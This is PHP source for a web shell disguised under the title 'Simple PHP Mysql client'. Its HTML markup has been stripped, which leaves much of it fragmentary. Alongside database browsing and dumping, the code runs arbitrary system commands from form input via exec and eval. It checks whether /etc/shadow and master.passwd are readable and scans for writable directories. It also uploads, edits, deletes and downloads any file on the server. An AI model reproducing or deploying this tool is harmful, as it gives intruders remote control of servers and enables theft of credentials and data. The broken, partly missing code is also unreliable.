Simple PHP Mysql client

$text");} function w($a){return str_repeat(" ",$a);} function b($b){return "$b";} function e($e){switch($e){ case 0:return('no such file'); case 1:return('no such dirictory'); case 2:return('permission denied'); case 3:return('is not dirictory'); case 4:return('is a dirictory'); }} function test_file($filename){ return(file_exists($filename)?(is_readable($filename)?false:font('red',e(2))):font('red',e(0)));} if(isset($_POST['downl']) && !empty($_POST['downf'])){ if(!preg_match('/^\//',$_POST['downf'])){ $_POST['downf']=$_POST['th'].'/'.$_POST['downf'];} if(!test_file($_POST['downf'])){ if(!is_dir($_POST['downf'])){ $fd=fopen($_POST['downf'], "rb"); $nam=preg_replace('/.+\//','',$_POST['downf']); header("Content-Type: application/octet-stream; name=\"".$nam."\""); header("Content-Length: ".filesize($_POST['downf'])); header("Content-disposition: attachment; filename=\"".$nam."\""); while(!feof($fd)){ $buffer=fgets($fd,4096); echo $buffer; } fclose ($fd); exit; } else $error=font('red',e(4)); } else $error=test_file($_POST['downf']);} if(isset($_POST['sql']) && !isset($_POST['exitsql'])){ $far=array('f','gz','bz','.txt','.gz','.bz2'); $text="Simple PHP Mysql client \nnot connect");} else{die($text."");} if(!empty($_POST['db'])){mysql_select_db($_POST['db'])or die("Could not select db
");} if(empty($_POST['table_sel']) && !empty($_POST['table_sel2']))$_POST['table_sel']=$_POST['table_sel2']; function load($file){ global $far; eval("\$zd=".$far[$_POST['compr']]."open(\$file,'r');"); ($_POST['compr']<2)?eval("\$buff='';while(!".$far[$_POST['compr']]."eof(\$zd)){\$buff.=".$far[$_POST['compr']]."gets(\$zd);}"):eval("\$buff=bzread(\$zd);"); eval($far[$_POST['compr']]."close(\$zd);"); return($buff); } function write($data){ global $dump,$fp,$far; ($_POST['save']==0)?$dump.=$data:eval($far[$_POST['compr']]."write(\$fp,\$data);");} function sqlh(){ if($_POST['save']>0){ global $server,$dbtr; write("#\n#Server : ".getenv('SERVER_NAME')." #DB_Host : ".$server." #DB : ".$_POST['db']. (($dbtr==0)?" #Table : ".$_POST['table_sel']:"")."\n#\n\n");}} function sql($tabel_sel){ global $connect; $row=mysql_fetch_row(mysql_query("SHOW CREATE TABLE `$tabel_sel`",$connect)); write("DROP TABLE IF EXISTS `$tabel_sel`;\n".$row[1].";\n\n");} function test($aaa){ $d=array(); while(list($key,$val)=each($aaa)){$d[$key]=addslashes($val);} return($d);} function sql1($table_sel){ global $connect; $result=mysql_query("SELECT * FROM `$table_sel`",$connect); while($line=mysql_fetch_assoc($result)){ ((!isset($key))?($key=implode('`, `',array_keys($line))):null); $ddd=test(array_values($line)); $val=implode('\', \'',$ddd); write("INSERT INTO `".$table_sel."`(`".$key."`) VALUES ('".$val."');\n");} mysql_free_result($result);} function head($tmpfname,$name){ header("Content-Type: application/octet-stream; name=\"$name\""); header("Content-Length: ".filesize($tmpfname).""); header("Content-disposition: attachment; filename=\"$name\""); $fd=fopen($tmpfname,"r"); while(!feof($fd)){ echo fgets($fd,4096);} fclose($fd); ($_POST['save']==1)?unlink($tmpfname):null; exit;} function csv($tabel_sel){ global $connect,$far; $res=mysql_query("SELECT * FROM `$tabel_sel`",$connect); $i=0; $keys=''; while($key=@mysql_field_name(mysql_list_fields($_POST['db'],$tabel_sel),$i++))$keys.=$key." : "; write('# Fields: '.substr($keys,0,-3)."\n\n"); if(mysql_num_rows($res)>0){ while($row=mysql_fetch_assoc($res)){ $values=array_values($row); foreach($values as $k=>$v){$values[$k]=addslashes($v);} $values=implode($_POST['cvs_term'],$values); write($values."\n"); }}} if(isset($_POST['back']) && (isset($_POST['table_sel']) || $_POST['dbtr']=1 )){ $dbtr=$_POST['dbtr']; $dump=''; if($_POST['save']>0){ $tmpfname=($_POST['save']==1)?tempnam($_POST['save_p'],"sess_"):$_POST['local']; eval("\$fp=".$far[$_POST['compr']]."open(\$tmpfname,'w');");} sqlh(); switch($_POST['as']){ case 0: switch($_POST['as_sql']){ case 0: if($dbtr==1){ $it=0; while($table_sel=@mysql_tablename(mysql_list_tables($_POST['db']),$it++)){ sql($table_sel); }} else sql($_POST['table_sel']); break; case 1: if($dbtr==1){ $it=0; while($table_sel=@mysql_tablename(mysql_list_tables($_POST['db']),$it++)){ sql($table_sel); sql1($table_sel); }} else { sql($_POST['table_sel']); sql1($_POST['table_sel']); } break; case 2: if($dbtr==1){ $it=0; while($table_sel=@mysql_tablename(mysql_list_tables($_POST['db']),$it++)){ sql1($table_sel); }} else sql1($_POST['table_sel']); break;} if($_POST['save']>0){ eval($far[$_POST['compr']]."close(\$fp);"); ($_POST['save']==1)?head($tmpfname,(($dbtr==1)?$_POST['db']:$_POST['table_sel']).$far[$_POST['compr']+3]):($message=''.$_POST['local'].' Saved');} break; case 1: if($dbtr==1){ $it=0; while($table_sel=@mysql_tablename(mysql_list_tables($_POST['db']),$it++)){ write("\n# Table: $table_sel\n"); csv($table_sel); }} else csv($_POST['table_sel']); if($_POST['save']>0){ eval($far[$_POST['compr']]."close(\$fp);"); ($_POST['save']==1)?head($tmpfname,(($dbtr==1)?$_POST['db']:$_POST['table_sel']).$far[$_POST['compr']+3]):''; } break;}} echo "$text\n

"; if(!isset($_POST['dd'])){ $db_list=mysql_list_dbs($connect); echo ""; } else echo "\n"; echo "

\n"; if(!empty($_POST['db'])){ $it=0; while($table_selt[]=@mysql_tablename(mysql_list_tables($_POST['db']),$it++)); if(isset($_POST['table_sel']) && !array_search($_POST['table_sel'],$table_selt))$_POST['table_sel']=''; if(mysql_num_rows(mysql_list_tables($_POST['db']))>0){ if(!isset($_POST['dt'])){ echo ""; } else { echo "\n"; }} else echo ' No tables'; echo "

SQL Search Export Import "; if(!empty($_POST['table_sel']))echo " Browse Insert"; echo "

\n".(isset($message)?$message:'');} if(isset($_POST['push']) && !empty($_POST['querysql']))$_POST['go']=4; if(isset($_POST['back']))$_POST['go']=2; if(isset($_POST['brow']))$_POST['go']=4; if(isset($_POST['editr']) && isset($_POST['edit']))$_POST['go']=6;// EDIT if(isset($_POST['ed_save']))$_POST['go']=7;//INSERT if(isset($_POST['editr']) && !isset($_POST['edit']) && $stn=$_POST['table_sel'])$_POST['go']=3; if(isset($_POST['search']))$_POST['go']=8; if(isset($_POST['up']))$_POST['go']=9; if(isset($_POST['dell']) || isset($_POST['delp']))$_POST['go']=10; if(!isset($_POST['go']) && !empty($_POST['table_sel']))$_POST['go']=4; if(isset($_POST['go'])){ switch($_POST['go']){ case 0: echo "

\n"; break; case 1: echo "

Location	Options	Search conditions	Limit

"; break; case 3: echo "

Load file:
Local file:
Text".(function_exists('gzencode')?'Gzip':'').(function_exists('bzcompress')?'Bzip2':'')."

"; break; case 4: if(!empty($_POST['table_sel']) || isset($_POST['querysql'])){ $sort=(!empty($_POST['sort'])?'ORDER BY `'.trim($_POST['sort']).'` '.(($_POST['asc']==='asc')?'ASC':'DESC').' ':''); $co=((isset($_POST['br_st']) && isset($_POST['br_en']) && isset($_POST['brow']))?$_POST['br_en'].','.$_POST['br_st']:'0,20'); $_POST['querysql']=(isset($_POST['querysql'])?$_POST['querysql']:"SELECT * FROM `".$_POST['table_sel']."` $sort limit $co"); $result=@mysql_query($_POST['querysql'],$connect) or print("

"); if(is_resource($result)){ $meta=mysql_fetch_field($result); $tables=$meta->table; $tr=0; if($tables==true){ $tr=1; if($quer=mysql_query("select count(*) from $tables"))$n=mysql_fetch_array($quer); else $tr=2; } else{ $_POST['table_sel']=$tables; if($tr==1)$n=mysql_fetch_array(mysql_query('select count(*) from '.$_POST['table_sel'])); } if($tr>0){ print($tr==1)?"":''; $arr=array(); for ($i=0;$i\n"; while($line=mysql_fetch_assoc($result)){ $linet=$line; if($tr>0){ if(!isset($lk)){ echo "\n"; foreach(array_keys($line) as $lk){print((count($arr)>0 && array_search($lk,$arr)!==false)?"":"\n");}} if(count($arr)==0){ while(list($key,$val)=each($line)){$up_e.="`$key`='".addslashes($val)."' and ";} $up_e=substr($up_e,0,-5);} else{ while(list($key,$val)=each($line)){ if(array_search($key,$arr)!==false){$up_e.="`$key`='".addslashes($val)."' and ";}} $up_e=substr($up_e,0,-4); } $up_e=urlencode($up_e); print "\n"; } else echo "\n"; $up_e=''; foreach($line as $col_value){ echo "\n"; } echo "\n";} echo "

	$lk	$lk
".(($tr==1)?"":' ')."
".((strlen($col_value)>40)?''.htmlspecialchars($col_value).'':htmlspecialchars($col_value))."

"; if($tr==1){ echo " Sort by Show row(s) starting from "; } mysql_free_result($result); } else{ if($result===false)echo mysql_error($connect); else echo 'Query susceful!'; }} break; case 2: if(!isset($_POST['back']))echo '

Export as

SQL

CSV

SQL

Only structure

All

Only data

CSV

Terminated

View

Download

Temp path

Save as local file

'. ((function_exists('gzencode'))?'':''). ((function_exists('bzcompress'))?'':'').'

Compression

None

Gzip

Bzip2

'.(!empty($_POST['table_sel'])?'':'').'

Backup

All DataBase

Only One Table

'; if(isset($_POST['back']) && $_POST['save']==0)echo ""; break; case 5: if(!empty($_POST['table_sel'])){ echo "

\n"; $fields=mysql_list_fields($_POST['db'],$_POST['table_sel'],$connect); for($i=0;$i\n";} echo "

".mysql_field_name($fields,$i).'

'.mysql_field_type($fields,$i).'('.mysql_field_len($fields,$i).")

".((mysql_field_len($fields,$i)<40)?"":"")."

";} break; case 6: $up_e=$_POST['edit']; echo ""; $up_e=urldecode($_POST['edit']); echo "

\n"; $fi=0; $result=mysql_query("SELECT * FROM `".$_POST['table_sel']."` WHERE $up_e",$connect); while($line=mysql_fetch_assoc($result)){ foreach($line as $key=>$col_value){ echo "\n"; $fi++;}} echo "

".mysql_field_name($result,$fi).'

'.mysql_field_type($result,$fi).'('.mysql_field_len($result,$fi).")

".((mysql_field_len($result,$fi)<40)?"":"")."

"; break; case 7: $ted=''; reset($_POST); while(list($key,$val)=each($_POST)){ if(preg_match('/^ed_key:(.+)/',$key,$m)){ $ted.="`".$m[1]."`= '".addslashes($val)."', "; }} $ted=substr($ted,0,-2); $query=((isset($_POST['insert']))?"INSERT":"UPDATE")." `".$_POST['table_sel']."` SET $ted ".((isset($_POST['insert']))?'':"WHERE ".urldecode($_POST['edit'])." LIMIT 1 "); echo "

".htmlspecialchars($query,ENT_QUOTES)."

"; $result=mysql_query($query,$connect) or print("

".mysql_error($connect)."

"); echo "

".mysql_info($connect)."

"; break; case 8: print "

"; $j=0; function spdb($line){ global $connect,$j,$sql; $fields=mysql_list_fields($_POST['db'], $line, $connect ); $columns=mysql_num_fields($fields); for($i=0;$i<$columns;$i++){ $nomField=mysql_field_name($fields,$i); $sql="SELECT ".$nomField." FROM ".$line." WHERE ".$nomField.' '.$_POST['opts'].(!preg_match('/NULL/',$_POST['opts'])?" ".(!preg_match('/[><]/',$_POST['opts'])?"'":'').addslashes($_POST['seart']).(!preg_match('/[><]/',$_POST['opts'])?"'":''):'').(!empty($_POST['limits'])?' LIMIT '.$_POST['limits']:''); $query=mysql_query($sql) or print(mysql_error($connect)); if(mysql_num_rows($query)>0){ while($result=mysql_fetch_array($query)){ echo "Table: ".$line." Field: ".$nomField."
SQL: ".htmlspecialchars($sql)."
".htmlspecialchars($result[0])."
"; echo "

"; $j++; }}}} if($_POST['locas']==0){ $tables=mysql_list_tables($_POST['db']); while($line=mysql_fetch_row($tables)){ spdb($line[0]); }} else{ spdb($_POST['table_sel']); } echo "

Results: ".$j.'

'; break; case 9: if(is_uploaded_file($_FILES['upload']['tmp_name'])) { $data=load($_FILES['upload']['tmp_name']); } elseif(!empty($_POST['load'])){ $data=load($_POST['load']); } if(isset($data)){ $arrup=explode(';',$data); if(preg_match('/^[ \n\r]?$/',$arrup[count($arrup)-1]))array_splice($arrup,-1); foreach($arrup as $aup){ mysql_query($aup,$connect) or $err=1; } print(isset($err)?mysql_error($connect):'Query susceful!'); } break; case 10: $code='DELETE FROM `'.$_POST['table_sel'].'` WHERE '.urldecode($_POST['edit']).' LIMIT 1'; isset($_POST['delp'])?mysql_query($code):print("

".htmlspecialchars($code).'

'); break; }} echo "

\n"; } else echo $text; echo ""; exit; } echo "

".font('blue',@php_uname())."

".font('blue','PHP:'.@phpversion())."

".font('blue',date('H:i:s l d F Y'))."

".font('blue',getenv('SERVER_ADDR'))."

".font('blue',getenv('REMOTE_ADDR'))."

\n"; if(!test_file('/etc/shadow'))echo font('red',b('shadow readable
')); if(!test_file('/etc/shadow-'))echo font('red',b('shadow- readable
')); if(!test_file('/etc/master.passwd'))echo font('red',b('master.passwd readable
')); if(!empty($_POST['th']))@chdir($_POST['th']); echo ((is_writable('/tmp/'))?font('green',"TEMP USE".w(1)):font('red',"TEMP NO USE")); #UP if(isset($_POST['up']))@chdir('../'); #CD if(isset($_POST['c']) && $_POST['cd']!=''){ if(!test_file($_POST['cd'])){ if(is_dir($_POST['cd'])){ @chdir($_POST['cd']); } else $error=font('red',e(3)); } else $error=test_file($_POST['cd']);} echo w(3).""; echo font('blue','USER : '.get_current_user()); if(file_exists("/")) echo((is_readable("/"))?w(2).font('green','DIR / - IS READ'):w(2).font('red','DIR / - IS NO READ')); if(file_exists("C:/")) echo((is_readable("C:/"))?w(2).font('green','DIR C:/ - IS READ'):w(2).font('red','DIR C:/ - IS NO READ')); if(ini_get('safe_mode'))echo w(2).font('red','SAFE MODE'); echo "
"; ?>

'; foreach($ar_file as $ar_l){ if(!test_file($ar_l))echo "\n";} echo ''; ?>

\n"; for($ach=7;$ach>=0;$ach--){echo"";} echo"";} ?>

Only dirOnly writeable:');} if(isset($_POST['fww']) && !empty($_POST['fpath'])){ echo b('Start path: Only dirOnly writeable:

'); $arrfw=array($_POST['fpath']); $ife=0; while(++$ife<=count($arrfw)){ $pathfw=$arrfw[$ife-1]; if(is_readable($pathfw)){ if($hfw=opendir($pathfw)){ while(false!==($ffw=readdir($hfw))){ $ffw=$pathfw.$ffw; if(!preg_match('/\/\.+$/',$ffw)){ if(is_dir($ffw)){array_push($arrfw,$ffw.'/');} print(is_dir($ffw)?(is_writeable($ffw)?font('red',"$ffw/
",3) :(isset($_POST['onw'])?null:"$ffw/
")):(!isset($_POST['dy'])?(is_writeable($ffw)?font('green',"$ffw
",3):(isset($_POST['onw'])?null:"$ffw
")):null));}} closedir($hfw);}}}} if(isset($_POST['eval'])){ echo "\n"; echo ""; } ############################################################################ #RENAME if(isset($_POST['rename']) && $_POST['renold']<>'' && $_POST['rennew']<>''){ if(file_exists($_POST['renold'])){ @rename($_POST['renold'],$_POST['rennew']); } else $error=font('red',e(0)); } # #RMDIR if(isset($_POST['rmd']) && isset($_POST['rmdir'])){ if(file_exists($_POST['rmdir'])){ if(is_dir($_POST['rmdir'])){ if(@rmdir($_POST['rmdir'])) echo font('green',"dir ".b($_POST['rmdir'])." delet"); else $error=font('red','dir not deleted'); } else $error=font('red',e(3)); } else $error=font('red',e(0)); } # #CHMOD if(isset($_POST['ch_chmod']) && isset($_POST['ch_mod'])){ if(file_exists($_POST['ch_mod'])){ @chmod($_POST['ch_mod'],octdec($_POST['ch_p1'].$_POST['ch_p2'].$_POST['ch_p3']));} else $error=font('red',e(0));} # #DELETE if(isset($_POST['del']) && $_POST['rm']!=''){ if(file_exists($_POST['rm'])){ if(!is_dir($_POST['rm'])){ @unlink($_POST['rm']); } else echo "
".font('red',e(4)."
"); } else echo "
".font('red',e(0)."
"); } # #EXEC if(!empty($_POST['exe'])){ if(@exec($_POST['exec'],$ar)){ echo "";}} # #OPEN FILE if(isset($_POST['op']) && $_POST['open']!=''){ if(!test_file($_POST['open'])){ if(!is_dir($_POST['open'])){ $fil=file($_POST['open']); echo "
".font('green',"FILE : ".$_POST['open'],3); if(is_writable($_POST['open'])==1){ echo w(2).font('green','ACCESS GRANTED'); echo ""; }} else $error=font('red',e(2)); } else $error=test_file($_POST['open']); } if(isset($_POST['save'])){ $fr=fopen($_POST['sv'],"w"); $out=$_POST['edit']; fputs($fr,$out); fclose($fr); } # #CREATE FILE if(isset($_POST['cr']) && $_POST['new']!=''){ if(is_writable(dirname($_POST['new']))){ echo font('green',"Create new file : ".$_POST['new'],3)."
"; } else echo "
".font('red',e(2)."
"); } if(isset($_POST['cre'])){ $ee=fopen($_POST['nf'],'w+'); $out=$_POST['newf']; fputs($ee,$out); fclose($ee); } # #MKDIR if(isset($_POST['mk']) && $_POST['mkdir']!=''){ if(is_writeable('./')){ @mkdir($_POST['mkdir']); echo font('green',"dir ".b($_POST['mkdir'])." create"); } else echo font('red',e(2)); } # echo "

"; #UPLOAD FILE if(isset($_POST['menu']) || isset($_POST['qq'])){ echo " "; if(isset($_POST['go_up'])){ if(isset($_POST['name']) && $_POST['name']==''){ $_POST['name']=$_FILES['userfile']['name'];} if(!preg_match('/^\//',$_POST['name'])){ $_POST['name']=$_POST['th'].'/'.$_POST['name'];} if(is_uploaded_file($_FILES['userfile']['tmp_name'])){ @copy($_FILES['userfile']['tmp_name'],$_POST['name']);} else echo "
".font('red',"Permisions denied");}} # #TEST PERM if(isset($_POST['tes']) && $_POST['test']!=''){ $j=$_POST['test']; if(file_exists($j)){ $w=''; if(is_writeable($j)){ $w=w(1).'WRITE'.w(1); } if(is_readable($j)){ $w=$w.w(1).'READ'.w(1); } echo font('green',$w.sprintf("%o", (fileperms($_POST['test'])) & 0777)); } else echo font('red',$e(0)); } # #COPY if(isset($_POST['copy'])&& $_POST['strin']!='' && $_POST['remot']!=''){ if(file_exists(dirname($_POST['remot']))){ if(file_exists($_POST['strin'])){ if(is_writable(dirname($_POST['remot']))){ if(is_readable($_POST['strin'])){ @copy($_POST['strin'],$_POST['remot']); } else echo font('red',"no read string file"); } else echo font('red',"no write dest directory"); } else echo font('red',"no such file"); } else echo font('red',"no such dest dir"); } # #CHECK DISK if(isset($_POST['free']) && $_POST['dirfree']!=''){ if(file_exists($_POST['dirfree'])){ $fre=@disk_free_space($_POST['dirfree'])/1048576; echo font('green',"Free space in ".b($_POST['dirfree'])." : ".$fre." Mb"); $fre1=@disk_total_space($_POST['dirfree'])/1048576; echo "
".font('green',"Full size in ".b($_POST['dirfree'])." : ".$fre1." Mb"); } else echo font('red',"No such disk"); } # (isset($_POST['info']))?phpinfo():null; # #PASSWD if(!empty($_POST['passwd']) && isset($_POST['passw'])){ echo "".font('blue',"file : ".$_POST['passwd'],6)."

\n";} # if(isset($error))echo $error;?>

".b(font('red','FUNCTION LIST PERMISSION DENIED',6)).""); sort($arr); echo ''; foreach($arr as $f){ $l=@lstat($f); print((is_readable($f) && is_writeable($f))?""; if(!is_dir($f)){ if(!is_link($f)){ echo w(2)."";} else echo "";} else echo ""; $fi=htmlspecialchars($f); echo "\n";} ?>

".w(1).b("R".w(1).font('red','RW',3)).w(1):(((is_readable($f))?"
".w(1).b("R").w(4):"").((is_writable($f))?"
".w(1).b(font('red','RW',3)):""))); $r=sprintf("%o",(@fileperms($f)) & 0777); $ow=posix_getpwuid($l[4]); $gr=posix_getgrgid($l[5]); $fow=($ow["name"]?$ow["name"]:fileowner($f))."/".($gr["name"]?$gr["name"]:filegroup($f)); if(!is_readable($f) && !is_writeable($f)) echo "
".w(12); echo "	$r	$fow	".$l[7]."	link	DIR	".@strftime('%B %e %H:%M',@filemtime($f))."	".(is_dir($f)?font('blue',$fi,3):$fi)."